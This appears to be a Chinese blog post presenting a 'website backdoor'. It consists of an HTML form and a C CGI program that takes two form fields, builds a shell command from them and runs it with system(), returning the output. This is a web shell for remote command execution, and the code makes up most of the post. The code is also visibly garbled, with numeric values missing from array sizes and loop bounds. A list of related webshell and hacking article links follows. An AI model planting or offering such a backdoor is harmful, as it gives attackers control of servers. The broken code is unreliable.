51.cgi网站后门
- 运行截图:
- html开发:
<html>
<body>
<form id="form" name="form" method="post" action="../cgi-bin/run.cgi">
<p></p>
<input type="text" name="cmd1" id="user" >
<p></p>
<input type="text" name="cmd2" id="pass" >
<p></p>
<input type="submit" name="go" id="run" value="submit">
</form>
</body>
</html> - cgi开发
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#include <time.h> void main()
{
//显示html文本
printf("Cotent-type:text/html\n\n");
//获取表单信息
char szpost[] = { };
gets(szpost);
//输出表单信息
printf("%s", szpost); //对表单信息进行处理,把'+'转换成' '
char *pstart = szpost;
for(int i=;i<;i++)
{
if (szpost[i] == '+')
{
szpost[i] = ' ';
}
} //处理':'号
char *pos1 = strstr(szpost, "%3A");
if (pos1 != NULL)
{
*pos1 = ':';
*(pos1 + ) = ' ';
*(pos1 + ) = ' ';
} //处理'\'
pos1 = strstr(szpost, "%2F");
if (pos1 != NULL)
{
*pos1 = '\\';
*(pos1 + ) = ' ';
*(pos1 + ) = ' ';
} //获取第一个输入框的内容
char *p1 = strchr(szpost, '&');
if (*p1 != NULL)
{
*p1 = '\0';
}
//输出第一个输入框的内容
printf("%s\r\n", szpost+); //获取第二个输入框的内容
char *p2 = strchr(p1 + , '&');
if (*p2 != NULL)
{
*p2 = '\0';
}
//输出第二个输入框的内容
printf("%s\r\n",p1+); //整合成cmd指令
char cmd[] = { };
//生成随机数,写入到随机数文件中
time_t ts;
unsigned data = time(&ts);
srand(&ts);
int num = rand(); //整合cmd指令,并重定向到文件
sprintf(cmd, "%s %s >%d.txt", szpost + , p1 + , num);
//文件名
char filename[] = { };
//生成文件名
sprintf(filename,"%d.txt", num);
//执行指令
system(cmd);
//打开文件
FILE *pf = fopen(filename,"r");
//读取文件
while (!feof(pf))
{
char ch = fgetc(pf);
putchar(ch);
}
//关闭文件
fclose(pf);
}
51.cgi网站后门的更多相关文章
- 网站后门shell-----eval
我们先来看看网站被攻击的代码: <?php error_reporting(E_ERROR); unlink('user.php'); unlink('../member/login.php') ...
- thinkphp网站后门-发现后门(Webshell)文件
不知道能不能解决, 1.登录阿里云后台,找到后门文件删除 2.执行 中国镜像 composer config -g repo.packagist composer https://packagist. ...
- 动态网站技术CGI
递信息的规程.CGI规范允许Web服务器执行外部程序,并将它们的输出发送给Web浏览器,CGI将Web的一组简单的静三种主流的动态网站技术: ASP JSP PHP 除之外,此还要了解的动态网站技术 ...
- 阿里云提醒 网站被WebShell木马后门的处理过程
昨晚凌晨收到新客户的安全求助,说是阿里云短信提示,网站有webshell木马文件被植入,我们SINE安全公司立即成立,安全应急响应小组,客户提供了阿里云的账号密码,随即登陆阿里云进去查看到详情,登陆云 ...
- 360在线网站安全检测,web安全测试AppScan扫描工具,XSS常用的攻击手法
360在线网站安全检测,web安全测试AppScan扫描工具,XSS常用的攻击手法 如何做好网站的安全性测试 360网站安全检测 - 在线安全检测,网站漏洞修复,网站后门检测http://websca ...
- 企业网站被黑 dedecms漏洞修复办法
前段时间网站被黑了,从百度打开网站直接被劫持跳转到了彩票,du博网站上去,网站的首页index.html文件也被篡改成一些什么北京sai车,pk10,一些cai票的关键词内容,搞得网站根本无法正常浏览 ...
- 修复网站漏洞对phpmyadmin防止被入侵提权的解决办法
phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多一些,最近phpmysql爆出漏洞,尤其是弱口令,sql注入漏洞,都会导致mysql的数据账号密码被泄露,那么如 ...
- Python3 CGI编程实现教程
一.背景说明 虽然很久以前就听说“早期的网站很多通过cgi形式实现”.“C++可通过CGI形式编写网页”,日积月累对CGI也有了一些概念,但一直没真正见过一个实际运行的CGI网站,总归还是有些底气不足 ...
- 手把手教你查看网站遭受到的Web应用攻击类型
常见Web应用攻击类型有:webshell.SQL注入.文件包含.CC攻击.XSS跨站脚本攻击.敏感文件访问.远程命令.恶意扫描.代码执行.恶意采集.特殊攻击.其他攻击十二种攻击类型. 如何查看网站遭 ...
随机推荐
- 启动hadoop遇到的datanode启动不了
从截图上看是datanode的clusterID 和 namenode的clusterID 不匹配. 解决办法: 根据日志中的路径,cd /hadoop/data/dfs/ 能看到 data和name ...
- vue子组件使用指令 同时绑定v-model 指令没有作用
//这里直接上代码 <!DOCTYPE html> <html lang="en"> <head> <meta charset=" ...
- UVa 216 Getting in Line【枚举排列】
题意:给出n个点的坐标,(2<=n<=8),现在要使得这n个点连通,问最小的距离的和 因为n很小,所以可以直接枚举这n个数的排列,算每一个排列的距离的和, 保留下距离和最小的那个排列就可以 ...
- Linux 运维笔试题(一)答案
答案: 1. ftp:21 远程连接telnet端口:23 smtp:25 rsync:873 SNMP:161 RPC(Remote Procedure Call,远程过程调用) ...
- blongsTo 用法
当存在这样两张表的时候: one{ , 'name':"name" 'sex':"sex" } two{ , 'type':json } 当我们需要在调用到 o ...
- 紫书 习题 10-9 UVa 294(正约数个数)
一个数的正约数个数等于这个数的质因数分解后 每一项幂+1的积 因为每个质因数的幂可以为0, 1, 2--(注意可以为0) 所以就每个质因数配一个幂任意组合就可得一个正因数,根据乘法原理可得正约数个数. ...
- Object-C,遍历目录
最近武汉连续下雨很多天,降温了2次,温度一下子由28度到14度,再到8度,手太冷了. 加上最近发生了一些比较棘手的家庭琐事,最近没心情继续学习Object-C. 后来,我想明白了,心情不好的时候,还是 ...
- ArcGIS api for javascript——查找任务-在地图上查找要素
描述 本例展示了如何使用查找任务搜索数据.本例在地图上用图表显示结果并用DojoX的grid格式化结果为表格样式. FindTask构造函数需要一个ArcGIS Server地图服务的URL.本例使用 ...
- [Poi] Build a Vue App with Poi
Poi uses the Vue babel presets by default, so there is no additional install required to get up-and- ...
- MyEclipse连接不上genymotion的解决方式
奇怪的是我的MyEclipse有时候连接得上genymotion,有时候又连接不上.之前连接不上的时候,就直接用真机调试,因此出现这个问题非常久了一直都没有去找解决方式.今天认真的反省了自己,再也不能 ...